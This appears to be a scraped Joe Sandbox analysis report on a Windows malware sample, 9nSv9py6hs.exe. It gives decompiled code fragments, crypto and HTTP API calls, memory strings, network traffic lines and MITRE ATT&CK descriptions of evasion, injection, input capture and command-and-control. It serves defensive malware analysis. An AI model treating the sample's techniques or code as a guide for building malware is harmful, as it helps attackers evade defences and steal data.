Similarity

API ID:
String ID:
API String ID:
Opcode ID: f831aef2992514454210ace4d5554d0bb21512af49db182eb9d76b04960971e1
Instruction ID: b8647798cfb3ae3d95b6736c922d23b301108a39ff2d2aa3a5e3edef27876bbf
Opcode Fuzzy Hash: f831aef2992514454210ace4d5554d0bb21512af49db182eb9d76b04960971e1
Instruction Fuzzy Hash: 1CE0E5B5109351AFD724CF18D944EA7BBE8AB85324F108A1EB4A987390C6B0A845CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406630 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00406630(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				intOrPtr* _t2;
				void* _t3;
				intOrPtr* _t6;
				intOrPtr* _t7;
				void* _t8;

				_t2 =  &_v4;
				 *_t2 = __edx;
				_t6 = _t7;
				 *_t6 = __ecx;
				_push(0x8000);
				_push(_t2);
				_push(_t6);
				_push(0xffffffff); // executed
				_t3 = E004075AE(_t8); // executed
				return _t3;
			}

0x00406633
0x00406637
0x00406639
0x0040663b
0x0040663d
0x00406642
0x00406643
0x00406644
0x00406646
0x0040664e

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112d1a0e2ade11bd2c93e6006e4c0e12e9f8260465fdb1af189d9bfcd9c1f9eb
Instruction ID: fc1dcb6c51d74816ff21581c638b3cbb987a5e4a8ef5ac1bf7258855a6d00586
Opcode Fuzzy Hash: 112d1a0e2ade11bd2c93e6006e4c0e12e9f8260465fdb1af189d9bfcd9c1f9eb
Instruction Fuzzy Hash: 12C080B09042007FE7007F049C0392177E4EBC5B20F608374B424863D0F5346C0C8573

Uniqueness

Uniqueness Score: -1.00%

Function 00408728 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00408728(void* __ecx) {
				void* _t5;
				void* _t7;

				_t8 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_t2 = _t8 + 4; // 0x8
					_t3 = _t8 + 8; // 0xc
					_push( *((intOrPtr*)(__ecx + 8)));
					_push(__ecx);
					_push(0xffffffff); // executed
					_t7 = E00402534(); // executed
					return _t7;
				}
				return _t5;
			}

0x00408728
0x0040872c
0x0040872e
0x00408731
0x00408735
0x00408739
0x0040873a
0x0040873c
0x00000000
0x0040873c
0x00408741

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214b48c19a4994e2125b703e48c537674d589aadaab0d91bfa01980c7093b9b5
Instruction ID: 3450f43eacde61da90cdbf99a55dd3440ca7ef6e50ed0d45349252343bd8b68e
Opcode Fuzzy Hash: 214b48c19a4994e2125b703e48c537674d589aadaab0d91bfa01980c7093b9b5
Instruction Fuzzy Hash: 72C01275000044BDD6089640CD04EA27728EB4131CBB8C39DA02C090D2D377D887C764

Uniqueness

Uniqueness Score: -1.00%

Function 004024F5 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004024F5(intOrPtr* __ecx) {
				intOrPtr _t1;
				void* _t2;

				_t1 =  *__ecx;
				if(_t1 != 0) {
					 *__ecx = 0;
					if(_t1 != 0xffffffff) {
						_push(_t1);
						_push(0xffffffff); // executed
						_t2 = E00404B16(); // executed
						return _t2;
					}
				}
				return _t1;
			}

0x004024f5
0x004024f9
0x004024fb
0x00402504
0x00402506
0x00402507
0x00402509
0x00000000
0x00402509
0x00402504
0x0040250e

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd28a6af66e882385ffcf5005fbea561b57b0d575311f26a952eb7008b2feca1
Instruction ID: c1f87a410f69bc32edbc052ff4352309222749d5f967602b89e3bade0bc224f9
Opcode Fuzzy Hash: cd28a6af66e882385ffcf5005fbea561b57b0d575311f26a952eb7008b2feca1
Instruction Fuzzy Hash: 28C04C7010550067EA605E398D9572632556B82338FB80B6AA435F52F4D679D8414519

Uniqueness

Uniqueness Score: -1.00%

Function 00407550 Relevance: .0, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407550(void* __ecx) {
				void* _t1;

				_push(0xffffffff); // executed
				_t1 = E00404B16(); // executed
				return _t1;
			}

0x00407551
0x00407553
0x00407558

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d87628cead80358bce4e9e404198239002e8868775ed8730954a498d85c00c8
Instruction ID: b65484776cabfb27bdaea6a3cd14e625021227d8f63d42c1f62bce9725664f6e
Opcode Fuzzy Hash: 4d87628cead80358bce4e9e404198239002e8868775ed8730954a498d85c00c8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 049C77C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 049C77EE
Module32First.KERNEL32(00000000,00000224), ref: 049C780E

Memory Dump Source

Source File: 00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp, Offset: 049C7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49c7000_9NSV9PY6HS.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 44e2ec8d730efb12767b1481eee3b1d3bb04f3aa7dde4d66698db8eef599c4d9
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: ECF062312007166FD7203BF5A88DA6A76ECAF89765F10057CE642910C0DA70F8458A62

Uniqueness

Uniqueness Score: -1.00%

Function 049C7485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 049C74D6

Memory Dump Source

Source File: 00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp, Offset: 049C7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49c7000_9NSV9PY6HS.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 74cb5968b8331a9276dff9635befc82db2f037e66ffc0fd005b288b91e7844cf
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 61113979A00208EFDB01DF98C985E99BBF5AF08351F0580A4F9489B361D371EA90EF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 049C70A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp, Offset: 049C7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49c7000_9NSV9PY6HS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: dc6d3ff0657eb0df0c84bc227373e68efa716eea606342260d50af99fd0392de
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: B51182723401019FD754DF95DC81FA673EAEB89364B1980A9ED08CB352E675EC42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00406944 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00406944(void* __eax, signed int __edx) {
				intOrPtr _t4;
				intOrPtr _t5;

				asm("rdtsc");
				_t5 =  *0x429008; // 0x39130bac
				asm("pause");
				asm("ror edx, cl");
				_t4 = 0xfea40268 + (__edx ^ __eax +  *0x42900c) * 0x9d38fe53;
				 *0x42900c = _t4;
				 *0x429008 = _t5 - _t4;
				return _t4;
			}

0x00406944
0x00406946
0x00406952
0x00406954
0x0040695e
0x00406965
0x0040696a
0x00406970

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d61462d269fb27d777de2dc075d5122b0eb9224927a905a9ecf2b1839029688
Instruction ID: 269e527ec65d8b3dc0757656bf59f4db4fa7675e50c16e6d4ff142fd5414f04f
Opcode Fuzzy Hash: 2d61462d269fb27d777de2dc075d5122b0eb9224927a905a9ecf2b1839029688
Instruction Fuzzy Hash: C7D012727002149F97A8CF39EE5165037D363A810CB4DC13A450AC3779D331585ACB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004069D4 Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069D4() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc))));
			}

0x004069e2

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74d8bcc9ea757f180d24a53de9c0b8011ff83211f406fe990e60a7219298543
Instruction ID: 97471e222890688258e037ebc65958b1753bc4ffdf89e4e1120ea87227e7a56b
Opcode Fuzzy Hash: b74d8bcc9ea757f180d24a53de9c0b8011ff83211f406fe990e60a7219298543
Instruction Fuzzy Hash: 6DB00239261540DFCA52CB08C194E40F3F4FB49760B0984D1EC058B721C234E900CA00

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FF89B CryptAcquireContextA,	0_2_005FF89B
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FC03A CryptAcquireContextA,CryptAcquireContextA,	0_2_005FC03A
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0064C1C5 CryptDecrypt,	0_2_0064C1C5
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FD2D9 CryptReleaseContext,CryptReleaseContext,	0_2_005FD2D9
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FD28E CryptDestroyHash,CryptDestroyHash,	0_2_005FD28E
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005CA2AD CryptDecrypt,	0_2_005CA2AD
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FB2A8 CryptGenKey,	0_2_005FB2A8
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0060532C CryptReleaseContext,	0_2_0060532C
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00612335 CryptBinaryToStringA,HttpSendRequestW,	0_2_00612335
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005DF30A CryptExportKey,	0_2_005DF30A
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FC47F CryptCreateHash,CryptCreateHash,	0_2_005FC47F
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005F64EE CryptExportKey,CloseHandle,	0_2_005F64EE
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005BB66F CryptDecrypt,	0_2_005BB66F
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FC60A CryptHashData,	0_2_005FC60A

Source: chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000003.327474361.000033E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$2()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$1(){return html`<!--_html_template_start_--><style include="cr-hidden-style"> equals www.facebook.com (Facebook)
Source: chrome.exe, 0000000D.00000003.327474361.000033E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$2()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$1(){return html`<!--_html_template_start_--><style include="cr-hidden-style"> equals www.twitter.com (Twitter)
Source: chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000003.429961698.000033E0007CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/B equals www.youtube.com (Youtube)

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9nSv9py6hs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe

C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp

C:\Users\user\AppData\Local\Temp\tmp0CBB.tmp

tmp0CBB.tmp (copy)

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
9nSv9py6hs.exe

Function 005FE33C Relevance: 26.8, APIs: 1, Strings: 14, Instructions: 517
COMMON

Function 005FF89B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
encryptionCOMMON

Function 00620B5F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 154
fileCOMMON

Function 005B70C5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124
libraryCOMMON

Function 005B761B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56
libraryCOMMON

Function 005F376E Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 53
memoryCOMMON

Function 006540B2 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Function 005FB909 Relevance: 1.3, APIs: 1, Instructions: 21
COMMON

Function 00611ADF Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Function 006376A9 Relevance: 24.7, APIs: 1, Strings: 15, Instructions: 701
COMMONCrypto

Function 006234F1 Relevance: 20.4, Strings: 16, Instructions: 450
COMMONCrypto

Function 00626319 Relevance: 16.6, Strings: 13, Instructions: 381
COMMONCrypto

Function 0060532C Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 93
encryptionCOMMON

Function 005D04A0 Relevance: 15.3, Strings: 12, Instructions: 345
COMMONCrypto

Function 0063F597 Relevance: 13.0, Strings: 10, Instructions: 467
COMMONCrypto

Function 006280A1 Relevance: 12.8, Strings: 10, Instructions: 260
COMMONCrypto

Function 0062C00C Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Function 00611207 Relevance: 10.4, Strings: 8, Instructions: 430
COMMONCrypto